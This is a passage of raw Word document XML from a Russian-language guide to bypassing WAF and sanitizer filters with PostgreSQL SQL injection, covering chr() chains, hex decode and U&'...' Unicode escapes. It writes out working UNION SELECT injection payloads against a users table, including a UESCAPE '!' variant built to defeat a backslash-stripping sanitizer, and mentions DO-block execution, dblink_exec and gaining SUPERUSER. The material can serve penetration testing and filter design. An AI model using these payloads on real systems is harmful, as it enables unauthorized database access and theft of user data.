        </w:rPr>
        <w:t xml:space="preserve">chr(integer) → text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, возвращает один символ по Unicode codepoint. PG 9.1+ принимает любой valid Unicode codepoint, до 9.1 — только ASCII.</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Оператор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text || text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конкатенация строк. Вычисляется на этапе исполнения, не парсинга.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Payload A результат конкатенации становится текстовым значением в выражении </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Парсер PG видит конкретное выражение, не строку — никаких допущений о структуре.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Payload B результат подаётся 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 plpgsql-конструкция, динамически парсит и исполняет полученную строку как SQL.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имеет ровно такую же модель безопасности, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в скриптовых языках — что подадите, то исполнится.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DO-блок (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $do$ ... $do$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — анонимная plpgsql-программа, синтаксически одна команда — см. 3.9.1 (Payload B) и 3.5 (граница «3.5 vs одна команда»).</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9.x – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые).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 built-in, стабилен с 8.0. Unicode-расширение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 с 9.1.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везде идентично self-hosted.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доступна PUBLIC.</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3.9.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — dollar-quoting, часто комбинируется с 3.9.2 для устранения внутренних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-escapes (как в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RAISE NOTICE $$%$$, ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в Payload B).</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3.9.5</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convert_from(decode('70675f617574686964', 'hex'), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — компактная альтернатива chr-цепочкам для длинных строк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через decode — одна шестнадцатеричная строка вместо девяти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вызовов).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — DO-блок как обход extended-protocol-stacking ограничения. Payload B полностью полагается на этот механизм.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3.6.1, 3.6.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основные потребители 3.9.2 (имена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dblink_exec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SERVER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3.8.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chr-payload для построения имени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после получения SUPERUSER через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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Identifier injection в plpgsql. Внутренний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 Payload B — это пример того же самого механизма, только инициированного атакующим.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\bchr\s*\(\s*\d+\s*\)\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (chr-цепочка из ≥3 звеньев)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3.9 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.9.md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String Functions and Operators — chr()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PL/pgSQL — EXECUTE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DO statement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character encoding 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chr / ASCII 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OWASP: SQL Injection Bypassing WAF — character functions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.3 Unicode escape U&amp;'\0027' и U&amp;"identifier"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Из WAF 3.9.0 этот приём напрямую обходит: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\b(dblink|pg_read|pg_authid|...)\w*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функции/каталоги по подстроке (как 3.9.2, но более компактно).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительные классы фильтров, против которых Unicode-escape сильнее, чем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 удаляющий вызовы функций:</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re.sub(r'\w+\s*\(', '', q)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — удаляет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decode(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convert_from(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Не трогает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потому что это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">строковый литерал на уровне лексера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не функция.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с эвристикой «слишком много `chr()`»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записывается одной строкой, без повторных function-call.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Custom escape через `UESCAPE`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если фильтр режет backslash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Unicode-escape допускает любой однобайтовый escape-символ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;'!0070!0067' UESCAPE '!'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — backslash в payload не появляется вовсе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Принципиальное ограничение то же, что у 3.9.2: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даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">строковое значение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не SQL-токен. Для имён функций/таблиц — через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 DO-блоке. Но есть бонус: PG также поддерживает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;"identifier"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">идентификаторов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (имена таблиц, колонок), что в некоторых сценариях позволяет проходить keyword-фильтры на лексическом уровне.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — U&amp;'...' для содержимого литерала</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст — фильтр блокирует подстроку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в payload-е (sanitizer запретил конкретные email-домены/usernames):</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 WHERE email = U&amp;'\0061\0064\006D\0069\006E\0040\0063\006F\002E\0063\006F\006D' --</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'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT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FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = U&amp;'\0061\0064\006D\0069\006E\0040\0063\006F\002E\0063\006F\006D' --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG-парсер на лексическом уровне видит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интерпретирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\NNNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как Unicode codepoint и собирает строку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'admin@co.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Дальше парсер выражений видит обычный текстовый литерал — WAF/sanitizer на стороне приложения подстроки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не находил, потому что её в payload-тексте нет (только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\0040</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Codepoint encoding-таблица для часто нужных символов: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Символ</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`\NNNN`</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Символ</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`\NNNN`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\0061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_</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\005F</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\0041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\0028</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\0030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\0029</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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (space)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\0020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\002C</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\0027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\003B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\0022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\002F</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\003D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\005C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для кодов вне BMP (U+10000 и выше) — синтаксис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\+NNNNNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (плюс плюс шесть hex-цифр). Для ASCII всегда хватает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\NNNN</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B — U&amp;'...' UESCAPE '!' (обход фильтра на backslash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Применимо, когда sanitizer удаляет/блокирует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UESCAPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> назначает альтернативный escape-символ — любой однобайтовый, кроме hex-цифр,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Контекст — sanitizer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">value = value.replace("\\", "")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Стандартный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;'\0027'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после sanitize превращается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;'0027'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не Unicode-escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а обычная строка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'0027'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атака сорвана. Замена escape-символа:</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 WHERE email = U&amp;'!0061!0064!006D!0069!006E!0040!0063!006F!002E!0063!006F!006D' UESCAPE '!' --</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'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT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FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = U&amp;'!0061!0064!006D!0069!006E!0040!0063!006F!002E!0063!006F!006D' UESCAPE '!' --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG распознаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
